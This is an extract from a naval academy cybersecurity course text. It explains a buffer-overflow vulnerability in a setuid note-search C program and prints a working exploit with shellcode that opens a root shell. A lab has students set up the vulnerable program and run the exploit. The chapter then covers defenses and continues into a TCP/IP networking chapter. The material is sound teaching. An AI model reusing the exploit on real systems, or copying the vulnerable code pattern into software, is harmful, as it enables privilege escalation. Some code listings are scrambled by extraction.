read( fd , &byte , 1 ) != 1 )
return -1 ;
byte = 0;
length = 0;
232
while( byte != '\n' )
{
if( read( fd , &byte , 1 ) != 1 )
return -1;
length = length + 1 ;
}
}
lseek( fd , length * -1 , SEEK_CUR );
return length ;
}
int print_notes( int fd , int uid , char * searchstring )
{
int note_length ;
char byte = 0 ;
char note_buffer[ 100 ] ;
note_length = find_user_note(
fd , uid );
if( note_length == -1 )
return 0;
read( fd , note_buffer , note_length ) ;
note_buffer[ note_length ] = 0 ;
if(
search_note( note_buffer , searchstring )
printf( note_buffer );
return 1;
}
int search_note( char *note
{
int i;
int keyword_length ;
int match = 0;
, char *keyword
)
keyword_length = strlen( keyword );
if( keyword_length == 0 )
return 1;
for(
{
i = 0
if(
;
i < strlen( note )
; i = i + 1 )
note[i] == keyword[ match ] )
match = match + 1 ;
else
{
if( note[ i ] == keyword[ 0 ] )
match = 1 ;
else
match = 0 ;
}
if ( match == keyword_length )
return 1;
}
return 0;
233
)
}
int main( int argc , char *argv[ ] )
{
int user_id;
int fd;
This innocent looking line of code is a
potential buffer overflow! Do you see
why?
int printing = 1;
char searchstring[ 100 ] ;
if( argc > 1 )
strcpy( searchstring , argv[ 1 ] ) ;
else
searchstring[ 0 ] = 0 ;
user_id = getuid( );
fd = open( "/tmp/notes" , O_RDONLY );
while( printing )
printing = print_notes( fd , user_id , searchstring );
close( fd );
}
So, notice that we have four functions: find_user_note , print_notes , search_note and main . We'll start (as
all programs start) with the main function.
The main function
1. int main( int argc , char *argv[ ] )
2. {
3.
int user_id;
4.
int fd;
5.
int printing = 1;
6.
char searchstring[ 100 ] ;
7.
if( argc > 1 )
8.
strcpy( searchstring , argv[ 1 ] ) ;
9.
else
10.
searchstring[ 0 ] = 0 ;
11.
user_id = getuid( );
12.
fd = open( "/tmp/notes" , O_RDONLY );
13.
14.
while( printing )
printing = print_notes( fd , user_id , searchstring );
15.
16. }
close( fd );
Four variables are declared in main. First, the integer user_id is declared in line 3. In line 11, this variable is assigned
the ID of the person running the program. So, for example, if joe is running the program, then user_id will be assigned
the value 501.
Next, the integer fd is declared in line 4. This variable will hold the file descriptor for the file /tmp/notes. The variable
fd is tied to the file /tmp/notes in line 12.
Third, the string named searchstring , declared in line 6, will hold the optional command line argument. If argc is
greater than 1 then the user did enter the optional argument, and this command line argument is placed in searchstring in
line 8. If the user did not enter the optional command line argument, then zero is placed in searchstring.
234
The variable printing is initially assigned the value of 1 in line 5. 1, so we will always enter the body of the while loop.
(Note that in C, if a Boolean expression evaluates to an integer other than zero, the Boolean expression is interpreted as true.)
This while loop calls the function named print_notes.
We will look at the function print_notes in a moment, but for now, accept on faith that the function print_notes will
look for a note from this user_id containing the searchstring, and if successful, will print out the note to the monitor
and then will return the value 1. If the value 1 is returned by print_notes, the while loop (line 13) will iterate again.
That will call the function print_notes again, and the function will look further into the file /tmp/notes (picking up
where it left off) and again search for a note from this user_id containing the searchstring. The function
print_notes will keep setting printing to 1 so long as the user with ID equal to user_id still has notes in the file
/tmp/notes. Eventually, there will be no more notes in the file /tmp/notes from this user_id containing the desired
searchstring, and, at that point, the function print_notes will return a 0. That ends the while loop's iteration and
ends the program.
The print_notes function
1.
2.
3.
4.
5.
Let's now turn our attention to the function print_notes.
int print_notes( int fd , int uid , char * searchstring )
{
int note_length ;
char byte = 0 ;
char note_buffer[ 100 ] ;
6.
note_length = find_user_note(
7.
8
if( note_length == -1 )
return 0;
9.
read( fd , note_buffer , note_length ) ;
10.
note_buffer[ note_length ] = 0 ;
11.
12.
if(
13.
14.
fd , uid );
search_note( note_buffer , searchstring )
printf( note_buffer );
)
return 1;
}
The integer variable note_length is declared on line 3. On line 6, the function named find_user_note is called, and
the return value from this function is placed in note_length. For now, accept on faith that the function find_user_note
returns the length of the next note in the file /tmp/notes that was put there by the user with ID equal to user_id . If the
function finds no such note, it returns -1.
So, at line 7, the variable note_length will contain either the number of bytes that were in a note left by the user running
the program, or will contain the value of -1 if no such note was found. If note_length does equal -1, then zero will be
returned to main on line 8, ending the iteration of the while loop in main.
The read function moves sequentially through a file without backing up. In other words, the read function starts reading
from a file precisely where the last read function left off.
In line 5, a string named note_buffer is declared, and on line 9, we read from the file a number of bytes equal to
note_length into the string note_buffer. The practical effect is that note_buffer now contains the next string that
was in the file /tmp/notes left by the user running the program. We then, in line 10, terminate the string with a NULL.
In line 11, we call the function named search_note giving the function as inputs note_buffer (which contains a string
left by this particular user found in the file /tmp/notes) and the string searchstring (which contains the characters
that the user entered as argv[1] ). If the desired searchstring is found within the string note_buffer, the function
search_note will return 1 and the contents of note_buffer will be printed to the monitor on line 12. This ensures that
we only print out notes from the user running the program if they contain the desired search string.
235
The find_user_note function
1.
2.
3.
4.
5.
int find_user_note( int fd , int user_uid )
{
int note_uid = -1 ;
unsigned char byte ;
int length;
6.
7.
8.
9.
while( note_uid != user_uid )
{
if( read( fd , &note_uid , 4 ) != 4 )
return -1 ;
10.
11.
if(
12.
13.
byte = 0;
length = 0;
14.
15.
16.
17.
while( byte != '\n' )
{
if( read( fd , &byte , 1 ) != 1 )
return -1;
18.
19.
20.
}
}
21.
lseek( fd , length * -1 , SEEK_CUR );
22.
23.
read( fd , &byte , 1 ) != 1 )
return -1 ;
length = length + 1 ;
return length ;
}
The function find_user_note searches through the file with descriptor fd, searching for a note from the user with ID
equal to user_uid. If it finds such a note, it returns the length of that note.
The integer note_uid is declared in line 3 and initialized to -1. Recall that when users run the Company Commander's
program to leave notes in the file /tmp/notes, their user ID is recorded before their note. The intent is that note_uid will
hold the user ID of the note being examined. Since the user ID cannot be equal to -1, the while loop on line 6 always iterates
at least once.
The if statement on lines 8-9 reads the user ID from the file /tmp/notes and places this value in note_uid. If we cannot
succeed in reading in the user ID, we must be at the end of the file, and we return a value of -1 on line 9.
The if statement on lines 10-11 reads past newline character which always follows the user ID in the file /tmp/notes.
Thus, at the start of line 14, note_uid contains the user ID of the note that is about to be read from the file, and the read
function is positioned at the first character in this note.
The while loop on lines 14-20 simply reads through the file, byte-by-byte, counting the total number of characters read
before a newline is encountered. The variable length, initialized to zero on line 13, keeps track of this running sum. When
we reach a new line character, the while loop on line 14 stops iterating, and length contains the length of the note left by
the user with ID equal to note_uid.
We then return to line 6, and examine the Boolean expression governing this while loop. If the ID of the user whose note
was just extracted from the file ( note_uid ) is not equal to the note of the person running the program ( user_uid ), then
this note that was just extracted is of no interest to us. We simply execute the while loop on lines 6-20 all over again, placing
the ID of the next note in note_uid and counting up the characters in this next note.
On the other hand if, upon returning to line 6 and examining the Boolean expression governing this while loop, we find that
the ID of the user whose note was just extracted from the file ( note_uid ) is equal to the note of the person running the
236
program ( user_uid ), then we have indeed found a note left by the person running the program. In this case, we exit the
line 6 while loop and jump to line 21.
At the start of line 21, we have found a note from the individual running the program, and we know the length of this user's
note. But, unfortunately, in determining the length of the user's note we have read past the end of the user's note in the file
/tmp/notes. So, in line 21, we reset the read function so that we are back at the start of this user's note. We do this by
backing up –length characters. After line 21, the next call to read will start reading the file /tmp/notes at the start of
the note of the user whose ID is in user_uid.
The search_note function
The search_note function takes two arguments: a string containing a note left by the user running the program, and the
searchstring that was entered by the user as a command line argument. If the searchstring is found anywhere within
the note left by the user, the program returns a value of 1. If the searchstring is not found within the user's note, the
function returns a value of 0.
You should be able to navigate through this function given the skills you have developed to date. The gory details of the
function are left as an exercise.
At this point, we’ll break for the Security Exercise. Let's jump to Security Exercise 10! After the Security Exercise is done,
we’ll return to your regularly scheduled lecture.
2. You've Been Hacked!
Back in Chapter 7, we noted that the very first major attack on DoD computer networks took place in February of 1998 and
lasted for over a week. The hackers gained administrative (i.e., “root”) access on UNIX machines at 7 Air Force sites and 4
Navy sites, gaining access to logistical, administrative and accounting records. The method used in this early attack—a buffer
overflow—has been used countless times ever since. You have just witnessed this buffer overflow in your lab!
Recall that the buffer overflow entails overwriting a buffer in such a way that an executable program is placed in the stack
memory. Earlier in the course, we looked at a buffer overflow in general terms. In that earlier example, recalled in the picture
shown below, a buffer named alpha_code has been overwritten with an executable program that extends beyond the buffer
allotted for alpha_code.
The idea behind the illustration above is that we can overwrite additional stack items, including the return address, which is
stored on the stack. The key for the exploit to work is that the return address must be set to the address of alpha_code! If
237
we manage to set the return address to the address of alpha_code, then the return address is the address of the start of the
executable program.
Then, when the function is done executing, the return address will be retrieved and the executable code that the adversary
placed on the stack will start executing. Again, the exploit involves the adversary placing his own program in memory and
making it execute.
The program exploit_notesearch.c that you examined in lab simply generates a command string that runs the
bettersearchnote.exe program. The function named system will simply run its argument. So the function call
system(command);
will act as though the user typed in whatever is held the string named command, and then hit return.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[])
{
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
This program will be explained in detail
by a separate PowerPoint presentation.
command = (char *) malloc(200);
bzero(command, 200);
// zero out the new memory
strcpy(command, "./bettersearchnote.exe \'"); // start command buffer
buffer = command + strlen(command); // set buffer at the end
if(argc > 1) // set offset
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // set return address
for(i=0; i < 160; i+=4) // fill buffer with return address
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // build NOP sled
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // run exploit
free(command);
}
Now, the string named shellcode contains machine language instructions to open a shell prompt.
This program executes ./bettersearchnote.exe and causes a buffer overflow that overwrites the return address,
pointing to the machine instructions contained in shell code. These instructions will open a shell. So… what’s the big deal
you might ask? The problem is that when a user (any old user) executes bettersearchnote.exe they are running the
program as root because the suid flag is set.
So… with the program running with elevated privileges, whose shell is opened? The answer: root’s
238
So, armed with a root shell, the hacker now has:




full control of the system
the ability to read anyone’s files
the ability to delete anyone’s files
the ability to install any software… including malware.
3. How is a Buffer Overflow Performed?
So...how would you perform a buffer overflow?
You would first attempt to see if this C flaw exists by entering a ridiculously long value (but one that you know) when prompted
to enter something, and you would check to see if that causes the program to behave erratically or crash with a segmentation
fault. This is an example of a technique known as “fuzz testing” or “fuzzing”. In general, fuzzing is the attempt to find soft
spots in a program.
If successful, you then can analyze the hex dump to see where your input string resides. You then use this info, plus the source
code (usually available for UNIX) to attempt to find where the return address is stored.
Crafting a buffer overflow attack is not easy. Hackers use two clever techniques to make the process a little more manageable.
Calling the contents inserted into the buffer the “payload”, we can say that the payload has three sections:

The desired return address is repeated many times at the end of the payload. Why the repetition? This gives the
hacker a number of chances to get the address correctly positioned in the return address field.

The executable program (the exploit)

A series of NOP instructions (assembly language “no operation” instructions). This series of NOPs is called the
“NOP sled”. Why the NOP sled? It lets the hacker be a little bit off with the return address. The return address
just has to point anywhere within the NOP sled. Otherwise the return address would need to be the precise first
address of the exploit.
4. Defenses Against the Buffer Overflow Attack
How can we prevent a process from being exploited by a buffer overflow?
We mentioned one technique that would surely work: We could add code to the compiler to check the bounds on each and
every array reference (i.e., we can make the compiler responsible for ensuring data integrity). But this would significantly slow
down all programs, and so is not a solution at all—it would be akin to preventing injuries in automobile accidents by imposing
a national 5 MPH speed limit.
We can certainly minimize buffer overflow exploits by very careful coding. In the words of a former member of the NSA's
elite hacker unit (the Tailored Access Operations Division) the solution is straightforward: "The bottom line for preventing
buffer overflows is to ensure that bounds are checked before stuffing a string into an array or otherwise using it." The
239
programmer must realize that she is responsible for data integrity, and must be vigilant in testing and retesting all code for this
potential problem.
Several C library functions are notorious for inviting buffer overflow problems. In our EC310 class, the strcpy function is
a well-known culprit. The designers of C have, in fact, provided an improved version of this particular command—the
improved version, named strncpy, introduces some protection against writing beyond the end of an array. The format for
the strncpy command is
strncpy(destination_string , source_string , number_of_characters_to_copy)
The strncpy command's third argument is the number of characters to copy. The programmer can ensure, through the use
of this third argument, that we do not write beyond the bounds of the string destination_string.
The function scanf was also revised to permit the user to have some control of the total number of characters read in from
the keyboard.
The battle between hackers and programmers never ends. When hackers first started to take advantage of the fact that strcpy
allows us to enter strings of any size into buffers of fixed size, programmers responded by writing the strncpy function.
Hackers quickly learned that if the source string is longer than the specified number of bytes to be copied, the strncpy
function does not automatically append a terminating NULL to the string that is copied. Thus, if the programmer is not careful,
a new set of hacks can be developed, based on the existence of strings sitting in memory without a NULL terminator.
Beyond awareness and careful coding, several technical solutions have been proposed.
The non-executable stack. This approach forbids the operating system from executing instructions that are on the stack.
Basically, with this approach, the eip register would never be permitted to hold an address that is in the stack's address range.
Machine language instructions would not ordinarily be found on the stack (the machine language instructions would be in the
text section), so there is no reason for the eip to ever point to the stack's region in memory.
It must be noted that this solution still poses some problems. First, it does not prevent a buffer overflow; rather, it prevents a
buffer overflow from following through with the execution of machine language instructions that were placed on the stack.
This approach does not protect against an adversary crashing our machine on a segmentation fault. Also, some highly
specialized applications actually depend on having executable code on the stack.
The canary. This approach entails placing a specific known value on the stack just prior to the return address. This known
value is termed a canary (since a canary was used in coal mines to provide an advance indication of danger). An attempt to
overwrite the return address will necessarily overwrite the canary. Before a function returns, the canary is checked to see if it
has been altered. If the canary has been altered, the program is halted.
Hackers have found ways to defeat the use of a canary. First, if known canaries are used (for example, if a canary of -1 is
always used, the hacker can perform a buffer overflow, overwriting the return address while making sure that the canary is
overwritten with the correct value (-1). If the programmer uses a pseudo-random canary, the hacker can attempt to read the
canary value as part of the exploit, taking care to overwrite it with the prior value.
Address Space Layout Randomization (ASLR). In this technique, the stack and the heap are placed in random memory
locations, preventing the hacker from easily predicting the location of the return address. Of course the locations of the stack
and the heap are not completely random, but are usually arranged according to a fixed number of possible options. Starting
with Vista, Microsoft used ASLR with 256 different possible options for the stack-heap layout. A common counter-hack (not
covered in this class) involves using format string vulnerabilities to determine the return address location. Of course hackers
are also studying the various layout options and, eventually but certainly, hacks will be developed for each of the layout options.
Practice Problem 10.1
Briefly describe two technical solutions that have been proposed to prevent a program from being exploited by a buffer
overflow.
Solution:
240
Problems
1.
Order these three main components of a buffer overflow exploit as they will appear on the stack:
shellcode
malicious return address
nop sled
2.
Aside from careful programming and the modification of several specific C commands, list and briefly describe two
technical solutions that have been proposed to prevent a program from being exploited by a buffer overflow.
3.
Explain why the buffer overflow described in this chapter is much more insidious than the buffer overflows described
in Chapter 7.
241
242
Security Exercise 10
Part I. Initial Conditions
To set up for this lab, carefully perform the following operations. Check off each step as you complete it. Let your instructor
or lab tech know if you encounter any problems.
1.
Navigate to your work directory by entering
cd work
In Lab 9 you used the program note2.c . Make sure that the program note2.c and its compiled machine code
version, note2.exe, are both still in your work directory by entering:
ls
You likely have additional files in your work directory—that's fine!
2.
Recall that the program named note2.c allowed all your Company mates to send you notes. The program has
made you famous, and the root user would like to purchase it from you. He will pay you 25,000 Iranian rials for the
program. 25,000 is a big number, so of course you accept. Transfer ownership of the program note2.c to the
root user by entering:
sudo
chown
root:root
./note2.exe
Verify that you have successfully transferred ownership of the file note2.exe to the root user by entering
ls
3.
–l
note2.exe
Now, the root user wants anyone to be able to execute the program note2.exe as though they were the root
user, so that anyone can leave notes in the file /tmp/notes . To give everyone the ability to write to the file
/tmp/notes in a very carefully controlled manner (only via the user of the program note2.exe) we must set the
setuid permission for the file note2.exe. To do this, enter:
sudo chmod u+s note2.exe
Verify that the setuid permission is enabled by entering
ls
–l
note2.exe
243
4.
In class today we discussed the program bettersearchnote.c . This program has been written for you and
placed in the ec310code directory. Copy this file to the work directory by carefully entering the following at the
home directory prompt:
midshipman@EC310:~ $
cp
ec310code/bettersearchnote.c
Make sure you are at your home directory!
work
Enter this!
Verify that you have bettersearchnote.c in your work directory by changing to the work
directory:
cd work
and then listing the files in the work directory:
ls
5.
We need to make one change to bettersearchnote.c . Open the file using nano:
nano
bettersearchnote.c
and change the line in the function main that reads
fd = open( "/var/notes" , O_RDONLY );
to read
fd = open( "/tmp/notes" , O_RDONLY );
The only change is that var becomes tmp
Save the program (Control-o then Control-x)
6.
Compile the program bettersearchnote.c as bettersearchnote.exe by entering:
gcc –o
bettersearchnote.exe
bettersearchnote.c
Make sure you now have bettersearchnote.exe in your work directory (enter ls).
7.
Transfer ownership of bettersearchnote.exe to the root user by entering
sudo
chown
root:root
./bettersearchnote.exe
and set the setuid permission on this program by entering
sudo chmod u+s bettersearchnote.exe
Verify that root owns the program and that the setuid permission is enabled by entering
ls
–l
bettersearchnote.exe
244
After all of these steps are completed, proceed to Part II.
By the time I was a First Lieutenant in the
Marine Corps, I earned a Navy Cross, a
Silver Star, two Bronze Stars and two
Purple Hearts.
Can you guess who I am?
Part II. Adding Some Notes
Let's add some notes to the file /tmp/notes.
First, let's start fresh by removing any old version of tmp/notes that might exist. Enter
rm
/tmp/notes
If you get a message saying "No such file or directory", that's okay.
Now, let's say that the root user wants to add a note saying: "Notes for today:". To accomplish this, enter
sudo su root
./note2.exe "Notes for today:"
exit
Now, let's have joe enter the note "Parades stink". To accomplish this, enter:
sudo su joe
./note2.exe
exit
"Parades stink"
Now, let's have matrix enter the note "What is for lunch?" To accomplish this, enter:
sudo su matrix
./note2.exe "What is for lunch?"
exit
Finally, let's have joe enter the note "Musters stink". To accomplish this, enter:
sudo su joe
./note2.exe
exit
"Musters stink"
Now, go back to your work directory (you may be there already) and look at the file /tmp/notes by entering
cat /tmp/notes
It didn't let you see the notes!
Question 1.
Why did the command cat
/tmp/notes not let you see the notes?
Question 2.
What command would you enter to view the file /tmp/notes ?
Enter your answer for Question 2 and show your instructor the contents of the file /tmp/notes. Then move on to Part III.
245
Part III. Using the Program bettersearchnote.exe
Recall that the program bettersearchnote.exe allows the user to view the notes that he has entered (and only the
notes that he has entered).
Suppose the user matrix wants to see the notes that she has left. Switch to user matrix:
sudo su matrix
and run the program as matrix:
./bettersearchnote.exe
Question 3.
Did the program work as expected?
Return to the user midshipman by entering
exit
Now recall that the program bettersearchnote.exe allows the user to enter a search string as a command line
argument, and the program will then only print out messages left by the user that contains the specified search string.
Switch to user joe:
sudo su joe
and run the program as joe:
./bettersearchnote.exe
Question 4.
What output did you obtain?
Now, run the program again, but giving a command line argument:
./bettersearchnote.exe
Question 5.
"Must"
What output did you obtain?
Return to the user midshipman by entering
exit
Switch to user root:
sudo su root
and run the program as root:
./bettersearchnote.exe
Question 6. What does root see when he runs the program?
Question 7. Why doesn't the root user see everyone's notes? He's root after all.
Return to the user midshipman by entering
exit
and proceed to Part IV.
246
Part IV. A Strange Occurrence
One of your friends has sent you a note:
"Here is a great program named exploit_notesearch.c . Try it out."
In the booksrc directory, there resides a file named exploit_notesearch.c.
Change to your home directory by entering
cd
From your home directory, copy this file by entering
midshipman@EC310:~ $
cp
booksrc/exploit_notesearch.c
Make sure you are at your home directory!
work
Enter this!
Verify that you have exploit_notesearch.c in your work directory by changing to the work directory:
cd work
and then listing the files in the work directory:
ls
If you do not have exploit_notesearch.c in your work directory STOP and ask your instructor or lab tech for
assistance. Otherwise, continue.
We have to make one change to this program. Open this program for editing using nano:
nano exploit_notesearch.c
and change the line that reads
strcpy(command, "./notesearch \'"); // start command buffer
to read
strcpy(command, "./bettersearchnote.exe \'"); // start command buffer
Note that this says bettersearchnote , not betternotesearch ! Add the .exe to the end!
Save the program (Control-o then Control-x)
Compile the program exploit_notesearch.c by entering
gcc exploit_notesearch.c
and execute the program by entering
./a.out
Question 8.
What shocking event just happened?
Question 9.
Enter whoami. What is the reply?
The programs used in this security exercise are adapted from programs presented in Hacking, The Art of Exploitation, No
Starch Press, 2008.
247
248
Security Exercise 10 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
249
250
Part II: The Network
You are now experts on the security of an individual host.
Well−okay−expert-ish.
In this module you will gain an in-depth understanding of how the Internet works today and how fragile its core infrastructure
really is. You will learn about the fundamental networking technologies and the design principles behind the Internet, and you
will examine the security risks associated with internetworking.
251
252
Chapter 11: The TCP/IP Model
Objectives:
(a) Describe the TCP/IP model, the functions performed by each layer, and the process of encapsulation.
(b) Define the function of a protocol.
EC310 is divided into three sections. We finished Part I: The Host, where we examined specific threats against an individual
computer in isolation from a network, focusing on the buffer overflow attack.
We now move on to Part II: The Network, where you will gain an in-depth understanding of how the Internet works today and
how fragile its core infrastructure really is.
After we complete the network section, we will move to our final unit, Part III: Wireless, where you will gain an appreciation
for the unique security threats inherent when operating in a wireless environment.
(Graphic by Dane Brown and Jennie Wood)
I. An Example of Network Fragility
The Internet was actually designed in the 1970s, long before its security became a concern. As the Internet's protocols were
being put in place, the underlying assumption was that the Internet would only be used by cooperating scientists and academics
who had no reasons to act with malice toward each other. Since security was not an issue, many of the underlying Internet
protocols, to this day, rely on a measure of trust and cooperation among the parties that regulate and control the Internet's
infrastructure.
253
This is particularly true when routing traffic through the Internet. It should be obvious that it is beneficial to route traffic from
source to destination using the best path. It would not make sense to route Internet traffic from Boston to New York via Tokyo.
The decisions concerning which routes are best for reaching various destinations are largely determined through cooperation
among the Internet's routers. Basically, each router tries to determine how easily it can get to various particular destinations,
and the routers exchange this information with each other. Through this cooperative exchange, a consensus emerges over
which routes are optimal to reach specific destinations from any starting point.
So, with so much cooperation, what could go wrong?
In 2008, A Dutch politician named Geert Wilders released a three and a half minute trailer for a controversial short film that
explored the ties between Koranic teachings and terrorism. The trailer and the film (which was subsequently released in 2009)
were both critical of Islam and created an uproar in many Muslim-dominated countries. The film trailer also caused an uproar
that reverberated throughout the global Internet. 17
Pakistanis marched through Karachi to protest the video. In response, the Pakistani government ordered that YouTube be
blocked in all of Pakistan to prevent Pakistani citizens from viewing the offending movie trailer.
On Sunday, February 4th, 2008, Pakistan Telecom, the national ISP, complied with the order to block YouTube by advertising
itself to the rest of the world as the best route to reach YouTube. In essence, Pakistan Telecom announced to the all other
routers on the Internet: "If you want to reach YouTube, I can get you there nearly instantaneously—so if you want to get to
YouTube quick, forward your request to Pakistan Telecom." A man trying to access YouTube from his home in Karachi had
his request routed to Pakistan Telecom instead.
But the repercussions extended far beyond the borders of Pakistan. The Internet's routers—throughout the world—assuming
that the information was truthful, autonomously adjusted their optimal route to YouTube by sending all worldwide YouTube
requests to Pakistan Telecom. Because of the level of trust among the Internet's key players, no verification was made to check
if the new route made any sense. Pakistan Telecom—needless to say—simply discarded these requests from people around
the world wanting to get to YouTube. Instead of the usual cat videos or clips of old people falling down the stairs, viewers
were greeted with this far less entertaining display:
It should be noted that subsequent investigations revealed that Pakistan Telecom only intended to block YouTube within
Pakistan; they did not foresee that their actions would affect the broader Internet. Also, Pakistan Telecom did not disrupt the
correct routing information that was all-the-while promulgated by YouTube's servers and Internet routers; it simply
promulgated "better" routing information.
In any event, the YouTube outage affected the world and lasted for over two hours.
In a similar incident, on Christmas Eve in 2004, a company in Turkey inadvertently announced that it was the best path to
everything on the Internet. A report by Todd Underwood of the Internet Management firm Renesys concluded that "Virtually
everything on the Internet was unreachable for someone: banks, governments, ecommerce sites, businesses, universities–no
one escaped the damage." This event lasted several hours.
17
The interested midshipman can view the controversial movie trailer here:
http://www.youtube.com/watch?v=jKCZfnpU1uc
254
Worldwide availability of YouTube drops from 100% to 0% for an hour,
and does not fully recover for over two hours. (Source: Keynote Systems)
Likewise, in an event that one can only assume was accidental, Con Edison—the electric company for New York City—
announced that it was the best route to reach Martha Stewart Living Omnimedia. For several hours, individuals who wanted
to check on the right color salad bowl to use at a springtime picnic were routed to the gritty website of a public service utility.
This is a problem affecting the Internet right now. The ease with which a hacker can manipulate routing tables to intercept or
redirect Internet traffic remains startling. In November 2013, Renesys noted that on 38 distinct occasions over the period
February 2013-November 2013, Internet traffic affecting major financial institutions and government agencies was inexplicably
routed through Belarus. The graph below shows the route taken by a banking transaction between New York and Los Angeles
that was mysteriously routed through Belarus.
These routing calamities are not limited to the US. On Tuesday January 21, 2014, most of China's 500 million Internet users
had all of their Internet traffic redirected to a nondescript residential building in Cheyenne, Wyoming. In short, China was cut
off from the Internet for about eight hours.
What would happen if an Internet Service Provider for Iran announced it had the best route to the US DoD?
More to the point: Why does the Internet work this way? For the next five weeks we will pull apart the infrastructure of this
mysterious creature called the Internet.
255
II. Layers
1. Divide and Conquer. Computer networks are exceedingly complex. To enable effective communication we must attempt
to coherently organize the various functions that must be carried out. To reduce the complexity in designing networks, and to
make the task more manageable, networks are organized as a series of layers. The guiding principles are:



Each layer performs only a few specific, well-defined functions. This simplifies the design.
The layers are built, one on top of the next.
Each layer performs a service for the layer above it. However, how a layer does its job is not known by the layer
above. This permits later modifications. A single piece of software that provides all networking capability would be
very hard to modify later.
This notion of organizing a network into a series of layers is similar (conceptually) to the way that programs are organized into
a series of modular functions.
2. Example.
Suppose you want to send an email to your friend. You have email application software on your computer, and your friend has
email application software on her computer. Thus, you can compose an email on your computer using your application, and if
this email was to land at the doorstep of the email application on your friend's computer, she could then read it. But… how
does this email get from your email application program to your friend's email application program? They are separated by a
geographic distance.
You have no idea of how to proceed in getting your email from the email application on your computer to the email application
on your friend's computer, so you consult with your friend, the Transport layer.
You don't recall when your friend Transport became so verbose, but you decide to leave your problem with him.
256
Although your friend Transport was willing to help, and has taken custody of your email message, he quickly realizes he cannot
proceed. Not knowing what to do, he contacts his friend, the Network layer.
You wonder about why your friend Network used so many words to say "I can't help you, but I'll see what I can do", but you—
Transport—decide to leave your problem (which was actually Application's problem) with your friend Network.
Although your friend Network was willing to help, and has taken custody of the email message, he quickly realizes he cannot
proceed. Not knowing what to do, he contacts his friend, the Data Link layer.
257
You wonder about why your friend Data Link is such a blabbermouth, but you—Network—are happy you do not have to deal
with Rickover Hall personnel, so you leave the email with your friend Data Link.
Although your friend Data Link was willing to help, and has taken custody of the email message, he quickly realizes he needs
his friend, the Physical Layer, to help.
You wonder about why your friend Physical is such a Debbie Downer, but then you remember—all those years in the basement
of Rickover!—and you're just happy to get the message to him (and off your desk).
258
But here is the important point: The physical layers are able to successfully communicate:
So, the original email leaves the email application on the left, travels down the five layers (Application, Transport, Network,
Data Link and Physical), then travels across a physical medium, landing in at the destination computer. At the destination
computer the message transits up the five layers, eventually arriving at the email application of your friend's computer, on the
right.
In light of the picture above, recall the guiding principles we mentioned at the outset:
 Each layer performs only a few specific, well-defined functions. This simplifies the design. For example, in the email
scenario above, the transport layer only worried about getting the message delivered to the right application (the email
application) and having it arrive correctly. The transport layer did not worry about routing (that was left to the network
layer) or whether logical one should be represented by +5 volts (that was left to the physical layer).
 The layers are built, one on top of the next.
259

Each layer performs a service for the layer above it. However, how a layer does its job is not known by the layer
above. This permits later modifications. For example, the network layer is tasked with determining the best route
from source to destination, but the choice of algorithm used should be of no consequence to the transport layer. If we
were to change the network layer routing algorithm from a link-state algorithm to a distance-vector algorithm, the
transport layer should not even be aware of this.
If we decided to try to build one big honking software/hardware contraption that does everything at once (i.e., just put the whole
kit and kaboodle into one layer), the resulting mess would be extremely difficult to modify later. Splitting functions into layers
simplifies the design. Additionally, it allows us to replace a layer with a different implementation that accomplishes the same
task using a different mechanism, without disturbing the other layers.
3. Protocols It is important to note that actual communication takes place only between the five layers in the same machine
and the physical layers of adjacent machines. In the picture on the preceding page, the dark black lines signify the only true
transfer of data—i.e., the only real communication. Apart from the physical layer, no data are actually directly transferred from
layer n on one machine to layer n on the other machine. Instead, each layer passes information/data only to the layer
immediately above or below it.
In a real sense, though, it seems as if the email application in the machine on the left in the picture above is communicating
directly with the email application in the machine on the right. Similarly, it seems as if the transport layer on the left is
communicating directly with the transport layer on the right. In fact, it seems as if each layer on the left is communicating with
its peer layer on the right. This communication is termed virtual communication.
A layer in one machine communicates with the corresponding layer on the other machine using that layer's protocol. For
example, the transport layer of the machine on the left communicates with the transport layer of the machine on the right using
the transport layer protocol.
A protocol is an agreement or a set of rules governing how a task or process should be carried out. We mentioned that one of
the functions of the transport layer is to ensure that data is delivered without errors. The transport layers on both machines
might, for example, use the Hamming code to ensure that errors are detected and corrected. In this case, the agreed upon
protocol for error detection at the transport layer is the Hamming code. If the transport layer in the machine on the left is using
the Hamming code to detect errors, but the machine on the right is using the CRC algorithm to detect errors, communication
will not be successful. The peer entities at each layer must agree on the protocol.
As another example, we mentioned that one of the functions of the physical layer is to determine how logical 1 and logical 0
are represented. If the physical layer of the machine on the left is representing logical one by +5 volts and logical zero as -5
volts, but the machine on the right is doing just the opposite—representing logical one as -5 volts and logical zero as +5 volts—
communication will not be successful. The peer entities at each layer must agree on the protocol.
To recap, two machines might be connected, but if a protocol is not in place at each layer, there will be no communication. If
two people are talking to (at) each other, one who only speaks English and the other who speaks only Chinese, no successful
communication will occur because the two speakers are not using the same protocol (in this case, the language). If agreed upon
260
protocols are in place, then the entities on the same layers on different machines (i.e., peer entities) carry on a conversation
using the agreed-upon protocol.
Some additional jargon to impress your date:
 Network Architecture. The set of layers and protocols is termed a network architecture.
 Protocol Stacks. The protocols used by a system are called the system's protocol stack.
4. Tanenbaum’s Philosopher Analogy18 The various terms—layers, protocols, virtual communication, etc.—may seem
confusing, so let's use these same concepts in a non-networking setting. Two philosophers wish to communicate, but they are
far apart and they don’t speak the same language. So they each hire a translator who translates their messages into a common
language. The translators then pass their messages along through secretaries, who can communicate through a common
interface. Note that it doesn’t matter what the common interface is (fax, phone, e-mail) as long as both secretaries use the same
interface. Similarly, it doesn’t matter what the common language is (Dutch, English, Swahili) as long as the translators agree.
Also, note that neither the secretaries nor the philosophers need know what the language choice was. Just like the philosophers
and the translators don’t need to know how the message is transmitted. Each layer just needs to understand its interface to the
next layer.
